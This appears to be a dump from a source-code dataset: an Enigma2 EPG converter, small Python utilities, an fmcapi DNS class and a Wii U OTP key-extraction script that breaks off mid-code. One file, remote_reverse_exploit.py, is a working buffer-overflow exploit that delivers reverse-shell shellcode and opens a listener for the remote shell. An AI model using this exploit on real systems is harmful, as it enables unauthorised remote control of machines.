repo_name
stringlengths 5
92
| path
stringlengths 4
232
| copies
stringclasses 19
values | size
stringlengths 4
7
| content
stringlengths 721
1.04M
| license
stringclasses 15
values | hash
int64 -9,223,277,421,539,062,000
9,223,102,107B
| line_mean
float64 6.51
99.9
| line_max
int64 15
997
| alpha_frac
float64 0.25
0.97
| autogenerated
bool 1
class |
---|---|---|---|---|---|---|---|---|---|---|
BlackHole/enigma2-obh10 | lib/python/Components/Converter/EventName.py | 2 | 10098 | from enigma import eEPGCache
from Components.Converter.Converter import Converter
from Components.Element import cached
from Components.Converter.genre import getGenreStringSub
from Components.config import config
from Tools.Directories import resolveFilename, SCOPE_CURRENT_SKIN
from time import localtime, mktime, strftime
class ETSIClassifications(dict):
def shortRating(self, age):
if age == 0:
return _("All ages")
elif age <= 15:
age += 3
return " %d+" % age
def longRating(self, age):
if age == 0:
return _("Rating undefined")
elif age <= 15:
age += 3
return _("Minimum age %d years") % age
def imageRating(self, age):
if age == 0:
return "ratings/ETSI-ALL.png"
elif age <= 15:
age += 3
return "ratings/ETSI-%d.png" % age
def __init__(self):
self.update([(i, (self.shortRating(c), self.longRating(c), self.imageRating(c))) for i, c in enumerate(range(0, 15))])
class AusClassifications(dict):
# In Australia "Not Classified" (NC) is to be displayed as an empty string.
# 0 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15
SHORTTEXT = ("", "", "P", "P", "C", "C", "G", "G", "PG", "PG", "M", "M", "MA", "MA", "AV", "R")
LONGTEXT = {
"": _("Not Classified"),
"P": _("Preschool"),
"C": _("Children"),
"G": _("General"),
"PG": _("Parental Guidance Recommended"),
"M": _("Mature Audience 15+"),
"MA": _("Mature Adult Audience 15+"),
"AV": _("Adult Audience, Strong Violence 15+"),
"R": _("Restricted 18+")
}
IMAGES = {
"": "ratings/blank.png",
"P": "ratings/AUS-P.png",
"C": "ratings/AUS-C.png",
"G": "ratings/AUS-G.png",
"PG": "ratings/AUS-PG.png",
"M": "ratings/AUS-M.png",
"MA": "ratings/AUS-MA.png",
"AV": "ratings/AUS-AV.png",
"R": "ratings/AUS-R.png"
}
def __init__(self):
self.update([(i, (c, self.LONGTEXT[c], self.IMAGES[c])) for i, c in enumerate(self.SHORTTEXT)])
# Each country classification object in the map tuple must be an object that
# supports obj.get(key[, default]). It need not actually be a dict object.
#
# The other element is how the rating number should be formatted if there
# is no match in the classification object.
#
# If there is no matching country then the default ETSI should be selected.
countries = {
"ETSI": (ETSIClassifications(), lambda age: (_("bc%d") % age, _("Rating defined by broadcaster - %d") % age, "ratings/ETSI-na.png")),
"AUS": (AusClassifications(), lambda age: (_("BC%d") % age, _("Rating defined by broadcaster - %d") % age, "ratings/AUS-na.png"))
}
class EventName(Converter, object):
NAME = 0
SHORT_DESCRIPTION = 1
EXTENDED_DESCRIPTION = 2
FULL_DESCRIPTION = 3
ID = 4
NAME_NOW = 5
NAME_NEXT = 6
NAME_NEXT2 = 7
GENRE = 8
RATING = 9
SRATING = 10
PDC = 11
PDCTIME = 12
PDCTIMESHORT = 13
ISRUNNINGSTATUS = 14
NEXT_DESCRIPTION = 21
THIRD_NAME = 22
THIRD_NAME2 = 23
THIRD_DESCRIPTION = 24
RAWRATING = 31
RATINGCOUNTRY = 32
RATINGICON = 33
KEYWORDS = {
# Arguments...
"Name": ("type", NAME),
"Description": ("type", SHORT_DESCRIPTION),
"ShortDescription": ("type", SHORT_DESCRIPTION), # added for consistency with MovieInfo
"ExtendedDescription": ("type", EXTENDED_DESCRIPTION),
"FullDescription": ("type", FULL_DESCRIPTION),
"ID": ("type", ID),
"NowName": ("type", NAME_NOW),
"NameNow": ("type", NAME_NOW),
"NextName": ("type", NAME_NEXT),
"NameNext": ("type", NAME_NEXT),
"NextNameOnly": ("type", NAME_NEXT2),
"NameNextOnly": ("type", NAME_NEXT2),
"Genre": ("type", GENRE),
"Rating": ("type", RATING),
"SmallRating": ("type", SRATING),
"Pdc": ("type", PDC),
"PdcTime": ("type", PDCTIME),
"PdcTimeShort": ("type", PDCTIMESHORT),
"IsRunningStatus": ("type", ISRUNNINGSTATUS),
"NextDescription": ("type", NEXT_DESCRIPTION),
"ThirdName": ("type", THIRD_NAME),
"ThirdNameOnly": ("type", THIRD_NAME2),
"ThirdDescription": ("type", THIRD_DESCRIPTION),
"RawRating": ("type", RAWRATING),
"RatingCountry": ("type", RATINGCOUNTRY),
"RatingIcon": ("type", RATINGICON),
# Options...
"Separated": ("separator", "\n\n"),
"NotSeparated": ("separator", "\n"),
"Trimmed": ("trim", True),
"NotTrimmed": ("trim", False)
}
RATSHORT = 0
RATLONG = 1
RATICON = 2
RATNORMAL = 0
RATDEFAULT = 1
def __init__(self, type):
Converter.__init__(self, type)
self.epgcache = eEPGCache.getInstance()
self.type = self.NAME
self.separator = "\n"
self.trim = False
parse = ","
type.replace(";", parse) # Some builds use ";" as a separator, most use ",".
args = [arg.strip() for arg in type.split(parse)]
for arg in args:
name, value = self.KEYWORDS.get(arg, ("Error", None))
if name == "Error":
print "[EventName] ERROR: Unexpected / Invalid argument token '%s'!" % arg
else:
setattr(self, name, value)
def trimText(self, text):
if self.trim:
return str(text).strip()
else:
return str(text)
def formatDescription(self, description, extended):
description = self.trimText(description)
extended = self.trimText(extended)
if description[0:20] == extended[0:20]:
return extended
if description and extended:
description += self.separator
return description + extended
@cached
def getBoolean(self):
event = self.source.event
if event:
if self.type == self.PDC and event.getPdcPil():
return True
return False
boolean = property(getBoolean)
@cached
def getText(self):
event = self.source.event
if event is None:
return ""
if self.type == self.NAME:
return self.trimText(event.getEventName())
elif self.type in (self.RATING, self.SRATING, self.RATINGICON):
rating = event.getParentalData()
if rating:
age = rating.getRating()
country = rating.getCountryCode().upper()
if country in countries:
c = countries[country]
else:
c = countries["ETSI"]
if config.misc.epgratingcountry.value:
c = countries[config.misc.epgratingcountry.value]
rating = c[self.RATNORMAL].get(age, c[self.RATDEFAULT](age))
if rating:
if self.type == self.RATING:
return self.trimText(rating[self.RATLONG])
elif self.type == self.SRATING:
return self.trimText(rating[self.RATSHORT])
return resolveFilename(SCOPE_CURRENT_SKIN, rating[self.RATICON])
elif self.type == self.GENRE:
if not config.usage.show_genre_info.value:
return ""
genre = event.getGenreData()
if genre:
rating = event.getParentalData()
if rating:
country = rating.getCountryCode().upper()
else:
country = "ETSI"
if config.misc.epggenrecountry.value:
country = config.misc.epggenrecountry.value
return self.trimText(getGenreStringSub(genre.getLevel1(), genre.getLevel2(), country=country))
elif self.type == self.NAME_NOW:
return pgettext("now/next: 'now' event label", "Now") + ": " + self.trimText(event.getEventName())
elif self.type == self.SHORT_DESCRIPTION:
return self.trimText(event.getShortDescription())
elif self.type == self.EXTENDED_DESCRIPTION:
return self.trimText(event.getExtendedDescription() or event.getShortDescription())
elif self.type == self.FULL_DESCRIPTION:
return self.formatDescription(event.getShortDescription(), event.getExtendedDescription())
elif self.type == self.ID:
return self.trimText(event.getEventId())
elif self.type == self.PDC:
if event.getPdcPil():
return _("PDC")
elif self.type in (self.PDCTIME, self.PDCTIMESHORT):
pil = event.getPdcPil()
if pil:
begin = localtime(event.getBeginTime())
start = localtime(mktime([begin.tm_year, (pil & 0x7800) >> 11, (pil & 0xF8000) >> 15, (pil & 0x7C0) >> 6, (pil & 0x3F), 0, begin.tm_wday, begin.tm_yday, begin.tm_isdst]))
if self.type == self.PDCTIMESHORT:
return strftime(config.usage.time.short.value, start)
return strftime(config.usage.date.short.value + " " + config.usage.time.short.value, start)
elif self.type == self.ISRUNNINGSTATUS:
if event.getPdcPil():
running_status = event.getRunningStatus()
if running_status == 1:
return _("Not running")
if running_status == 2:
return _("Starts in a few seconds")
if running_status == 3:
return _("Pausing")
if running_status == 4:
return _("Running")
if running_status == 5:
return _("Service off-air")
if running_status in (6, 7):
return _("Reserved for future use")
return _("Undefined")
elif self.type in (self.NAME_NEXT, self.NAME_NEXT2) or self.type >= self.NEXT_DESCRIPTION:
try:
reference = self.source.service
info = reference and self.source.info
if info:
test = ["ITSECX", (reference.toString(), 1, -1, 1440)] # Search next 24 hours
self.list = [] if self.epgcache is None else self.epgcache.lookupEvent(test)
if self.list:
if self.type == self.NAME_NEXT and self.list[1][1]:
return pgettext("now/next: 'next' event label", "Next") + ": " + self.trimText(self.list[1][1])
elif self.type == self.NAME_NEXT2 and self.list[1][1]:
return self.trimText(self.list[1][1])
elif self.type == self.NEXT_DESCRIPTION and (self.list[1][2] or self.list[1][3]):
return self.formatDescription(self.list[1][2], self.list[1][3])
if self.type == self.THIRD_NAME and self.list[2][1]:
return pgettext("third event: 'third' event label", "Later") + ": " + self.trimText(self.list[2][1])
elif self.type == self.THIRD_NAME2 and self.list[2][1]:
return self.trimText(self.list[2][1])
elif self.type == self.THIRD_DESCRIPTION and (self.list[2][2] or self.list[2][3]):
return self.formatDescription(self.list[2][2], self.list[2][3])
except:
# Failed to return any EPG data.
if self.type == self.NAME_NEXT:
return pgettext("now/next: 'next' event label", "Next") + ": " + self.trimText(event.getEventName())
elif self.type == self.RAWRATING:
rating = event.getParentalData()
if rating:
return "%d" % rating.getRating()
elif self.type == self.RATINGCOUNTRY:
rating = event.getParentalData()
if rating:
return rating.getCountryCode().upper()
return ""
text = property(getText)
| gpl-2.0 | 6,620,502,956,419,688,000 | 32.326733 | 174 | 0.650426 | false |
jtraver/dev | python/graphics/graph3.py | 1 | 1381 | #!/usr/bin/python
# http://mcsp.wartburg.edu/zelle/python/graphics.py
from graphics import *
SCALE = 10
def test():
win = GraphWin()
win.setCoords(0,0,10,10)
t = Text(Point(5,5), "Centered Text")
t.draw(win)
p = Polygon(Point(1,1), Point(5,3), Point(2,7))
p.draw(win)
e = Entry(Point(5,6), 10)
e.draw(win)
win.getMouse()
p.setFill("red")
p.setOutline("blue")
p.setWidth(2)
s = ""
for pt in p.getPoints():
s = s + "(%0.1f,%0.1f) " % (pt.getX(), pt.getY())
t.setText(e.getText())
e.setFill("green")
e.setText("Spam!")
e.move(2,0)
win.getMouse()
p.move(2,3)
s = ""
for pt in p.getPoints():
s = s + "(%0.1f,%0.1f) " % (pt.getX(), pt.getY())
t.setText(s)
win.getMouse()
p.undraw()
e.undraw()
t.setStyle("bold")
win.getMouse()
t.setStyle("normal")
win.getMouse()
t.setStyle("italic")
win.getMouse()
t.setStyle("bold italic")
win.getMouse()
t.setSize(14)
win.getMouse()
t.setFace("arial")
t.setSize(20)
win.getMouse()
win.close()
def circle():
win = GraphWin("My Circle", 100 * SCALE, 100 * SCALE)
c = Circle(Point(50 * SCALE,50 * SCALE), 10 * SCALE)
c.draw(win)
win.getMouse() # Pause to view result
win.close() # Close window when done
def main():
test()
circle()
main()
| mit | -1,893,172,085,288,062,700 | 20.246154 | 57 | 0.548878 | false |
tigercomputing/vortex | src/vortex/__init__.py | 1 | 2455 | # -*- coding: utf-8 -*-
#
# Copyright © 2015 Tiger Computing Ltd.
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
"""
Vortex provides a means to specialise a bare Linux cloud instance according to
a version-controlled configuration.
It is designed to be bootstrapped from an `Amazon AWS`_ instance's `User Data`_
field using `Cloud-Init`_. From there it configures your instance according to
your configuration (for example using `Puppet`_).
.. _Amazon AWS: http://aws.amazon.com/
.. _User Data: http://docs.aws.amazon.com/AWSEC2/latest/UserGuide/\
ec2-instance-metadata.html
.. _Cloud-Init: https://launchpad.net/cloud-init
.. _Puppet: https://puppetlabs.com/
"""
from __future__ import absolute_import, print_function, unicode_literals
import logging
import vortex.logsetup
# NB important side-effect: this import runs pre-requisite checks.
from vortex.environment import check_modules
logger = logging.getLogger(__name__)
def stage2():
"""
Main entry-point for Stage 2 of the bootstrapping process.
This function is called by the :mod:`vortex.bootstrap` module once the main
:mod:`vortex` package is available. This checks that the environment is set
up correctly (using :func:`vortex.environment.check_modules` with
``install=True``), then starts the deployment process by calling
:meth:`vortex.runtime.Runtime.run`.
"""
# We can't set up logging properly until we can read our configuration,
# which we can't do until we have Six installed. Let's just tweak some
# defaults so the user can see *something* before we get that far.
vortex.logsetup.configure(None)
# Make sure we have all the modules we require
check_modules(install=True)
# Now that we have the required modules, we can import our main runtime and
# get started
from vortex.runtime import runtime
runtime.run()
| gpl-3.0 | 4,379,782,510,870,833,000 | 36.753846 | 79 | 0.737571 | false |
daxm/fmcapi | fmcapi/api_objects/object_services/dnsservergroups.py | 1 | 2479 | """DNS Server Groups Class."""
from fmcapi.api_objects.apiclasstemplate import APIClassTemplate
import logging
class DNSServerGroups(APIClassTemplate):
"""The DNSServerGroups Object in the FMC."""
VALID_JSON_DATA = [
"id",
"name",
"type",
"retries",
"timeout",
"dnsservers",
"defaultdomain",
]
VALID_FOR_KWARGS = VALID_JSON_DATA + []
URL_SUFFIX = "/object/dnsservergroups"
REQUIRED_FOR_POST = ["name", "timeout"]
VALID_CHARACTERS_FOR_NAME = """[.\w\d_\- ]"""
def __init__(self, fmc, **kwargs):
"""
Initialize DNSServerGroups object.
Set self.type to "DNSServerGroupObject" and parse the kwargs.
:param fmc: (object) FMC object
:param kwargs: Any other values passed during instantiation.
:return: None
"""
super().__init__(fmc, **kwargs)
logging.debug("In __init__() for DNSServerGroups class.")
self.parse_kwargs(**kwargs)
self.type = "DNSServerGroupObject"
def servers(self, action, name_servers):
"""
Associate DNS Servers.
:param action: (str) 'add', 'remove', or 'clear'
:param name_servers: (str) Name of DNS server.
"""
logging.debug("In servers() for DNSServerGroups class.")
if action == "add":
for name_server in name_servers:
if "dnsservers" in self.__dict__:
self.dnsservers.append({"name-server": name_server})
else:
self.dnsservers = [{"name-server": name_server}]
logging.info(
f'Name-server "{name_server}" added to this DNSServerGroups object.'
)
elif action == "remove":
if "dnsservers" in self.__dict__:
for name_server in name_servers:
self.dnsservers = list(
filter(
lambda i: i["name-server"] != name_server, self.dnsservers
)
)
else:
logging.warning(
"DNSServerGroups has no members. Cannot remove name-server."
)
elif action == "clear":
if "dnsservers" in self.__dict__:
del self.dnsservers
logging.info(
"All name-servers removed from this DNSServerGroups object."
)
| bsd-3-clause | 5,905,963,153,461,864,000 | 32.958904 | 88 | 0.519968 | false |
sigma-random/Win32_Shellcode | C-shellcode/remote_reverse_exploit.py | 1 | 3240 | #!/usr/bin/env python
from socket import *
from struct import *
from time import *
import sys
def L32(val): return pack('<I',val)
def ip_value(ip_str):
ret = 0x00000000
str_list = ip_str.split('.')
for i in xrange(len(str_list)):
ret += int(str_list[i])<<(3-i)*8
return ret
def exploit(ip,port,data):
sockfd = socket(AF_INET,SOCK_STREAM)
sockfd.connect((ip,port))
sockfd.send(data+'\x0a')
#sockfd.recv(1)
sockfd.close()
def recv_until(sockfd,mark=''):
ret = ''
while True:
buf = sockfd.recv(4096)
ret += buf
if mark in buf :
break
return ret
def bind_local(ip,port):
servsockfd = socket(AF_INET , SOCK_STREAM)
servsockfd.bind((ip,port))
servsockfd.listen(10)
print "listen on %s:%s" % (ip,port)
clisockfd,client_addr = servsockfd.accept()
print "connected from remote host %s:%s" % client_addr
sys.stdout.write(recv_until(clisockfd,mark='>'))
while True:
data = raw_input()
if data in ['exit','q','quit']:
break
clisockfd.send(data+'\n')
sys.stdout.write(recv_until(clisockfd,mark='>'))
clisockfd.close()
servsockfd.close()
return
########################################################################################################
TARGET_IP = '192.168.43.128'
TARGET_PORT = 1000
############################################################
# reverse shellcode
#
# notice: change 192.168.43.1 with your ip
############################################################
REVERSE_IP = '192.168.43.1'
REVERSE_PORT = 4444
REVERSE_SHELLCODE = \
"\xFC\xE8\x89\x00\x00\x00\x60\x89\xE5\x31\xD2\x64\x8B\x52\x30\x8B" +\
"\x52\x0C\x8B\x52\x14\x8B\x72\x28\x0F\xB7\x4A\x26\x31\xFF\x31\xC0" +\
"\xAC\x3C\x61\x7C\x02\x2C\x20\xC1\xCF\x0D\x01\xC7\xE2\xF0\x52\x57" +\
"\x8B\x52\x10\x8B\x42\x3C\x01\xD0\x8B\x40\x78\x85\xC0\x74\x4A\x01" +\
"\xD0\x50\x8B\x48\x18\x8B\x58\x20\x01\xD3\xE3\x3C\x49\x8B\x34\x8B" +\
"\x01\xD6\x31\xFF\x31\xC0\xAC\xC1\xCF\x0D\x01\xC7\x38\xE0\x75\xF4" +\
"\x03\x7D\xF8\x3B\x7D\x24\x75\xE2\x58\x8B\x58\x24\x01\xD3\x66\x8B" +\
"\x0C\x4B\x8B\x58\x1C\x01\xD3\x8B\x04\x8B\x01\xD0\x89\x44\x24\x24" +\
"\x5B\x5B\x61\x59\x5A\x51\xFF\xE0\x58\x5F\x5A\x8B\x12\xEB\x86\x5D" +\
"\x68\x33\x32\x00\x00\x68\x77\x73\x32\x5F\x54\x68\x4C\x77\x26\x07" +\
"\xFF\xD5\xB8\x90\x01\x00\x00\x29\xC4\x54\x50\x68\x29\x80\x6B\x00" +\
"\xFF\xD5\x50\x50\x50\x50\x40\x50\x40\x50\x68\xEA\x0F\xDF\xE0\xFF" +\
"\xD5\x89\xC7\x68" +\
pack('>L',ip_value(REVERSE_IP)) +\
"\x68\x02\x00" +\
pack('>H',REVERSE_PORT) +\
"\x89\xE6\x6A" +\
"\x10\x56\x57\x68\x99\xA5\x74\x61\xFF\xD5\x68\x63\x6D\x64\x00\x89" +\
"\xE3\x57\x57\x57\x31\xF6\x6A\x12\x59\x56\xE2\xFD\x66\xC7\x44\x24" +\
"\x3C\x01\x01\x8D\x44\x24\x10\xC6\x00\x44\x54\x50\x56\x56\x56\x46" +\
"\x56\x4E\x56\x56\x53\x56\x68\x79\xCC\x3F\x86\xFF\xD5\x89\xE0\x4E" +\
"\x56\x46\xFF\x30\x68\x08\x87\x1D\x60\xFF\xD5\xBB\xE0\x1D\x2A\x0A" +\
"\x68\xA6\x95\xBD\x9D\xFF\xD5\x3C\x06\x7C\x0A\x80\xFB\xE0\x75\x05" +\
"\xBB\x47\x13\x72\x6F\x6A\x00\x53\xFF\xD5"
if __name__ == '__main__':
JUNK = L32(0x90909090)
EIP = L32(0x7ffa4512) #jmp_esp = 0x7ffa4512
data = 'a' * 64 + JUNK + EIP + JUNK + REVERSE_SHELLCODE
print '\n\n[*] begin to exploit.....'
exploit(TARGET_IP, TARGET_PORT, data)
bind_local(REVERSE_IP,REVERSE_PORT)
print '\n\n[*] finished!......'
| gpl-2.0 | 4,696,895,885,518,288,000 | 31.4 | 104 | 0.61821 | false |
Whovian9369/OTPKeySplitter | OTPKeySplitter.py | 1 | 15977 | #!/usr/bin/env python3
import os, sys, zlib, binascii
import codecs
from Crypto.Cipher import AES
otpbin = os.path.abspath("otp.bin")
if not os.path.exists(otpbin):
print("Put the otp.bin into this directory, please!")
sys.exit(1)
keytxt = open('Keys.txt', 'a')
#Thank you Audiosurf for the initial directory creation help.
#Mine was way too messy originally!
x = "Output/"
k = " - Wii U Bank"
outputfol = [x, x+"00 - Wii Bank" , x+"01"+k, x+"02"+k, x+"03"+k, x+"04 - Wii U NG Bank", x+"05 - Wii U Certificate Bank" , x+"06 - Wii Certificate Bank", x+"07 - Misc Bank"]
for f in outputfol:
if not os.path.exists(f):
os.makedirs(f)
#Other Variables that will be used later down the line:
out0 = x+"00 - Wii Bank"+"/"
out1 = x+"01"+k+"/"
out2 = x+"02"+k+"/"
out3 = x+"03"+k+"/"
out4 = x+"04 - Wii U NG Bank/"
out5 = x+"05 - Wii U Certificate Bank/"
out6 = x+"06 - Wii Certificate Bank/"
out7 = x+"07 - Misc Bank/"
#End other variables
#prepare keys
#Thanks FIX94 for this code snippet from the iosuhax
#fw.img grabber in his IOSUHax fork.
#For the source of this code, see:
#https://github.com/FIX94/iosuhax/blob/master/bin/getfwimg.py
with open(otpbin,'rb') as f:
print("Key extraction time!")
# First, vWii.
f.seek(0x000)
wii_boot1_sha1 = f.read(20)
f.seek(0x014)
wii_common_key = f.read(16)
f.seek(0x024)
wii_ng_id = f.read(4)
f.seek(0x028)
wii_ng_priv_key = f.read(29)
f.seek(0x044)
wii_nand_hmac = f.read(20)
f.seek(0x058)
wii_nand_key = f.read(16)
f.seek(0x068)
wii_rng_key = f.read(16)
f.seek(0x078)
wii_unknown01_padding = f.read(8)
#Wiki switches to Bank 1 (Wii U) right here. See #L78 // 0x300 begins Bank 6.
f.seek(0x300)
wii_root_cert_ms_id_0x00000002 = f.read(4)
f.seek(0x304)
wii_root_cert_ca_id_0x00000001 = f.read(4)
f.seek(0x308)
wii_root_cert_ng_key_id = f.read(4)
f.seek(0x30C)
wii_root_cert_ng_signature = f.read(60)
f.seek(0x348)
wii_korean_key = f.read(16)
f.seek(0x358)
wii_unknown02_unused = f.read(8)
f.seek(0x360)
wii_private_nss_device_cert_key = f.read(32)
# Wii U
f.seek(0x080)
security_level_flag = f.read(4)
f.seek(0x084)
iostrength_config_flag = f.read(4)
f.seek(0x088)
seeprom_manual_clk_pulse_length = f.read(4)
f.seek(0x08C)
SigType_00010000 = f.read(4)
f.seek(0x090)
wiiu_starbuck_ancast_key = f.read(16)
f.seek(0x0A0)
wiiu_seeprom_key = f.read(16)
f.seek(0x0B0)
unknown_01_unused = f.read(16)
f.seek(0x0C0)
unknown_02_unused = f.read(16)
f.seek(0x0D0)
vwii_common_key = f.read(16)
f.seek(0x0E0)
wiiu_common_key = f.read(16)
f.seek(0x0F0)
unknown_03_unused = f.read(16)
f.seek(0x100)
unknown_04_unused = f.read(16)
f.seek(0x110)
unknown_05_unused = f.read(16)
f.seek(0x120)
encrypt_decrypt_ssl_rsa_key = f.read(16)
f.seek(0x130)
usb_storage_key_seed_encryption_key = f.read(16)
f.seek(0x140)
unknown_06 = f.read(16)
f.seek(0x150)
wiiu_xor_key = f.read(16)
f.seek(0x160)
wiiu_rng_key = f.read(16)
f.seek(0x170)
wiiu_slc_nand_key = f.read(16)
f.seek(0x180)
wiiu_mlc_emmc_key = f.read(16)
f.seek(0x190)
encrypt_decrypt_shdd_key = f.read(16)
f.seek(0x1A0)
encryption_key_for_drh_wlan_data = f.read(16)
f.seek(0x1B0)
unknown_07_unused = f.read(48)
f.seek(0x1E0)
wiiu_slc_nand_hmac = f.read(20)
f.seek(0x1F4)
unknown_08_padding = f.read(12)
f.seek(0x200)
unknown_09_unused = f.read(16)
f.seek(0x210)
unknown_10_unused = f.read(12)
f.seek(0x21C)
wiiu_ng_id = f.read(4)
f.seek(0x220)
wiiu_ng_private_key = f.read(32)
f.seek(0x240)
wiiu_private_nss_device_cert_key = f.read(32)
f.seek(0x260)
wiiu_otp_rng_seed = f.read(16)
f.seek(0x270)
unknown_12_unused = f.read(16)
f.seek(0x280)
wiiu_root_cert_ms_id_0x00000012 = f.read(4)
f.seek(0x284)
wiiu_root_cert_ca_id_0x00000003 = f.read(4)
f.seek(0x288)
wiiu_root_cert_ng_key_id = f.read(4)
f.seek(0x28C)
wiiu_root_cert_ng_signature = f.read(64)
f.seek(0x2C8)
unknown_14_unused = f.read(20)
f.seek(0x2E0)
unknown_15_locked_by_boot1 = f.read(32)
# MISC
f.seek(0x380)
boot1_locked_unknown_01 = f.read(32)
f.seek(0x3A0)
boot1_key_locked_by_b0 = f.read(16)
f.seek(0x3B0)
boot0_locked_unused_01 = f.read(16)
f.seek(0x3C0)
misc_empty1 = f.read(32)
f.seek(0x3E0)
misc_empty2 = f.read(4)
f.seek(0x3E4)
otp_version_and_revision = f.read(4)
f.seek(0x3E8)
otp_date_code = f.read(8)
f.seek(0x3F0)
otp_version_name_string = f.read(8)
f.seek(0x3F8)
misc_empty3 = f.read(4)
f.seek(0x3FC)
jtag_status = f.read(4)
#Output to files. This will be messy.
#Probably way messier than above.
#vWii
# 0. Wii Bank
targetfol=out0
keytxt.write("(Most of) vWii:\n\n")
WII = (
("01. Wii boot1 SHA-1 hash", wii_boot1_sha1),
("02. Wii common key", wii_common_key),
("03. Wii NG ID", wii_ng_id),
("04. Wii NG private key", wii_ng_priv_key),
("05. Wii NAND HMAC (overlaps with NG private key)", wii_nand_hmac),
("06. Wii NAND key", wii_nand_key),
("07. Wii RNG key", wii_rng_key),
("08. Unknown (Padding)", wii_unknown01_padding)
)
for name, data in WII:
with open(targetfol+name+".bin", "wb") as fi:
fi.write(data)
keytxt.write("\n{}: {}\n".format(
name, binascii.hexlify(data).decode('utf-8')))
keytxt.write("\n------------------------------------------------")
# Wii U
keytxt.write("\n\n*(Mostly) Wii U:\n")
keytxt.write("\n 1. Wii U Bank\n")
# 1. Wii U Bank
targetfol=out1
name="01. Security level flag"
fi = open(targetfol+name+".bin", "wb")
fi.write(security_level_flag)
fi.close()
keytxt.write("\n"+name+": " + binascii.hexlify(security_level_flag).decode('utf-8')+"\n")
name="02. Some flag for IOStrength configurations"
fi = open(targetfol+name+".bin", "wb")
fi.write(iostrength_config_flag)
fi.close()
keytxt.write("\n"+name+": " + binascii.hexlify(iostrength_config_flag).decode('utf-8')+"\n")
name="03. Pulse length for SEEPROM manual CLK"
fi = open(targetfol+name+".bin", "wb")
fi.write(seeprom_manual_clk_pulse_length)
fi.close()
keytxt.write("\n"+name+": " + binascii.hexlify(seeprom_manual_clk_pulse_length).decode('utf-8')+"\n")
name="04. Seems_To_Be_A_Sig_Type_(0x00010000)"
fi = open(targetfol+name+".bin", "wb")
fi.write(SigType_00010000)
fi.close()
keytxt.write("\n"+name+": " + binascii.hexlify(SigType_00010000).decode('utf-8')+"\n")
name="05. Wii U Starbuck ancast key"
fi = open(targetfol+name+".bin", "wb")
fi.write(wiiu_starbuck_ancast_key)
fi.close()
keytxt.write("\n"+name+": " + binascii.hexlify(wiiu_starbuck_ancast_key).decode('utf-8')+"\n")
name="06. Wii U SEEPROM key"
fi = open(targetfol+name+".bin", "wb")
fi.write(wiiu_seeprom_key)
fi.close()
keytxt.write("\n"+name+": " + binascii.hexlify(wiiu_seeprom_key).decode('utf-8')+"\n")
name="07. Unknown (01)"
fi = open(targetfol+name+".bin", "wb")
fi.write(unknown_01_unused)
fi.close()
keytxt.write("\n"+name+": " + binascii.hexlify(unknown_01_unused).decode('utf-8')+"\n")
name="08. Unknown (02)"
fi = open(targetfol+name+".bin", "wb")
fi.write(unknown_02_unused)
fi.close()
keytxt.write("\n"+name+": " + binascii.hexlify(unknown_02_unused).decode('utf-8')+"\n")
name="09. vWii common key"
fi = open(targetfol+name+".bin", "wb")
fi.write(vwii_common_key)
fi.close()
keytxt.write("\n"+name+": " + binascii.hexlify(vwii_common_key).decode('utf-8')+"\n")
name="10. Wii U Common Key"
fi = open(targetfol+name+".bin", "wb")
fi.write(wiiu_common_key)
fi.close()
keytxt.write("\n"+name+": " + binascii.hexlify(wiiu_common_key).decode('utf-8')+"\n")
name="11. Unknown (03)"
fi = open(targetfol+name+".bin", "wb")
fi.write(unknown_03_unused)
fi.close()
keytxt.write("\n"+name+": " + binascii.hexlify(unknown_03_unused).decode('utf-8')+"\n")
# 2. Wii U Bank
keytxt.write("\n 2. Wii U Bank\n")
targetfol=out2
name="01. Unknown (04)"
fi = open(targetfol+name+".bin", "wb")
fi.write(unknown_04_unused)
fi.close()
keytxt.write("\n"+name+": " + binascii.hexlify(unknown_04_unused).decode('utf-8')+"\n")
name="02. Unknown (05)"
fi = open(targetfol+name+".bin", "wb")
fi.write(unknown_05_unused)
fi.close()
keytxt.write("\n"+name+": " + binascii.hexlify(unknown_05_unused).decode('utf-8')+"\n")
name="03. Key to encrypt or decrypt SSL RSA key"
fi = open(targetfol+name+".bin", "wb")
fi.write(encrypt_decrypt_ssl_rsa_key)
fi.close()
keytxt.write("\n"+name+": " + binascii.hexlify(encrypt_decrypt_ssl_rsa_key).decode('utf-8')+"\n")
name="04. Key to encrypt seeds for USB storage keys"
fi = open(targetfol+name+".bin", "wb")
fi.write(usb_storage_key_seed_encryption_key)
fi.close()
keytxt.write("\n"+name+": " + binascii.hexlify(usb_storage_key_seed_encryption_key).decode('utf-8')+"\n")
name="05. Unknown (06)"
fi = open(targetfol+name+".bin", "wb")
fi.write(unknown_06)
fi.close()
keytxt.write("\n"+name+": " + binascii.hexlify(unknown_06).decode('utf-8')+"\n")
name="06. Wii U XOR key"
fi = open(targetfol+name+".bin", "wb")
fi.write(wiiu_xor_key)
fi.close()
keytxt.write("\n"+name+": " + binascii.hexlify(wiiu_xor_key).decode('utf-8')+"\n")
name="07. Wii U RNG key"
fi = open(targetfol+name+".bin", "wb")
fi.write(wiiu_rng_key)
fi.close()
keytxt.write("\n"+name+": " + binascii.hexlify(wiiu_rng_key).decode('utf-8')+"\n")
name="08. Wii U SLC (NAND) key"
fi = open(targetfol+name+".bin", "wb")
fi.write(wiiu_slc_nand_key)
fi.close()
keytxt.write("\n"+name+": " + binascii.hexlify(wiiu_slc_nand_key).decode('utf-8')+"\n")
# 3. Wii U Bank
keytxt.write("\n 3. Wii U Bank\n")
targetfol=out3
name="01. Wii U MLC (eMMC) key"
fi = open(targetfol+name+".bin", "wb")
fi.write(wiiu_mlc_emmc_key)
fi.close()
keytxt.write("\n"+name+": " + binascii.hexlify(wiiu_mlc_emmc_key).decode('utf-8')+"\n")
name="02. Key to encrypt and decrypt SHDD key"
fi = open(targetfol+name+".bin", "wb")
fi.write(encrypt_decrypt_shdd_key)
fi.close()
keytxt.write("\n"+name+": " + binascii.hexlify(encrypt_decrypt_shdd_key).decode('utf-8')+"\n")
name="03. Key to encrypt DRH WLAN data"
fi = open(targetfol+name+".bin", "wb")
fi.write(encryption_key_for_drh_wlan_data)
fi.close()
